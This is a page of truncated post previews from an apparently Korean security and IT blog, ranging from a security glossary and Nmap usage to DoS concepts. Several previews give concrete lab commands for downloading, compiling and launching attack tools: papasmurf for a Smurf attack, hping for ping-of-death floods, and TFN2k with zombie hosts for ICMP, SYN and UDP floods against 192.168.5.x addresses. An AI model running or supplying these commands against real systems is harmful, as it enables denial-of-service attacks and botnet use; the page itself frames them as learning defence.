기술자료 썸네일형 리스트형 보안 용어 정리 보안에 관해서는 방화벽 ~ DB 암호화 까지 다양하게 적용이 될 수 있겠는데요 용어 정리가 잘 되어 있는 자료가 있어 소개 시켜 드리려고 합니다 현존하는 보안에 관해서는 대부분 나와 있어 IT 보안 도입을 생각하시는 분들은 각각 어떤 보안이 어떤일을 하는건지의 개념정도는 숙지가 가능하실것 같네요 PS) 보안 관련된 카테고리가 별도로 없어 이곳에 올립니다 . 양해 부탁드려요 보안 주요 내용 가. 보안시스템 1) 방화벽 ◦ 내부망과 외부망 사이의 불법적인 접근을 차단하는 시스템 2) 침입 탐지 및 차단시스템(IPS) ◦ 네트워크에 연결된 시스템에 수상한 침입 활동을 감시하며, 침입방지를 위하며, 침입방지를 위하여 자동으로 조치를 취하여 중단시키는 솔루션 3) 국정원 보안 적합성 인증 가상사설망(VPN) ◦ .. 더보기 부트시퀀스 과정 부트시퀀스 과정을 설명하였습니다. 첨부파일을 참고하시기 바랍니다. 더보기 Windows 의 전원을 켜면 Windows 의 전원을 켜면 부팅과정이 어떻게 되는지 설명 해놓았습니다. 첨부파일을 참고하시기 바랍니다. * WINDOWS XP 를 기준으로 설명하였습니다. 더보기 WebKnight 로그 분석 안내서 KISA 인터넷 침해 사고 대응 지원센터 에서 나온 웹나이트 로그 분석 안내서 입니다. WebKnight 로그 분석시 사용시 참고 하시기 바랍니다. 더보기 NMAP 사용법 Nmap wget http://nmap.org/dist/nmap-5.51.tgztar zxvf nmap-5.51.tgzcd nmap-5.51 1. Ping Scan : 시스템의 on/off 여부를 파악하기 위함 nmap -sP192.168.5.1 nmap -sP192.168.5.1-20 nmap -sP192.168.5.0/242. 기본 Scan : 스캔이 시작되면, TCP(SYN)를 보내어 포트상태를 확인 nmap192.168.5.13. TCP Scan : TCP를 이용하는 서비스만 확인 가능 ==> 3-wayhandshaking을 완성시키므로 로그에 기록됨 nmap -v -sT192.168.5.14. Stealth Scan : 마지막 ACK를 보내지 않으므로 연결이 완성되지 않음 nmap -v -sS1.. 더보기 Sniffing 이란 Sniffing Promiscuous Mode : 목적지주소와 장치 주소가 일치하지 않아도 Frame을 버리지 않고 수집하는 모드. (= 마구잡이 모드, 무차별 수집 모드 ) 대책)1. Telnet, FTP 대신에 SSH 등을 사용한다.2. SSL 서버를 설치하여 http대신에 https를 사용하도록 한다.DoS, DDoS: 정치적 이슈 : Denial of Service (서비스 불능 공격) : 부하 증가 1. ICMP 관련 공격 (Echo Request / Reply ) - Ping of Death : ICMP data를 지속적으로, 많이, 빠르게보내서 상대편 시스템의 부하를 증가시키는 기법 - LAND Attack : 출발지 주소를 목적지 주소로 동일하게 하여 응답을 자기 자신에게 주도록 하는 방법.. 더보기 Smurf Attack 공격 기법 * Smurf Attack - Papasmurf wget http://packetstorm.foofus.com/new-exploits/papasmurf-linux.cgcc -o papasmurf papasmurf-linux.c touch b.txtvi b.txt 192.168.5.255:wq! ./papasmurf 192.168.5.1 b.txt * 스머프 공격이란? 참고 : http://terms.naver.com/entry.nhn?docId=45320 **공격을 위한 공격이 아닌 공격을 배움으로서 방어를 배우셨으면 합니다. 해당 게시물의 무단 불펌을 불허 합니다.** 더보기 Hping ( Hacker's Ping ) 사용기법 Hping ( Hacker's Ping ) : 패킷을 조작, 생성 가능 DoS, 스캐닝, Spoofing 기능 wget http://www.hping.org/hping2.0.0-rc3.tar.gztar zxf hping2.0.0-rc3.tar.gz cd hping2-rc3./configure makemake stripmake install hping --help (hping의 매뉴얼) 1. Ping of Deathhping --icmp 192.168.5.1 ( ping 보내는 명령어 )hping --icmp 192.168.5.1 -d 6500 ( -d : datasize )hping --icmp 192.168.5.1 -d 6500 -i u1000 ( -i :interval , u1000 : 1000마이크.. 더보기 DDOS 공격 기법 DDOS * TFN2k wget http://packetstorm.austin2600.net/distributed/tfn2k.tgztar zxvf tfn2k.tgzcd tfn2kcd srcvi ip.h /*struct in_addr { unsigned long int s_addr; };*/:wq!make./td --좀비호스트로 보내서실행touch hosts.txtvi hosts.txt192.168.5.127:wq! 1. ICMP Attack./tfn -f hosts.txt -c 6 -i 192.168.5.12. TCP SYN Attack./tfn -f hosts.txt -c 5 -i 192.168.5.1 -p 213. UDP Attack./tfn -f hosts.txt -c 4 -i 192.168.5.1.. 더보기 WS-C4500 시스코 WS-C4500 운영구축안 입니다 더보기 이전 1 ··· 8 9 10 11 12 13 14 ··· 50 다음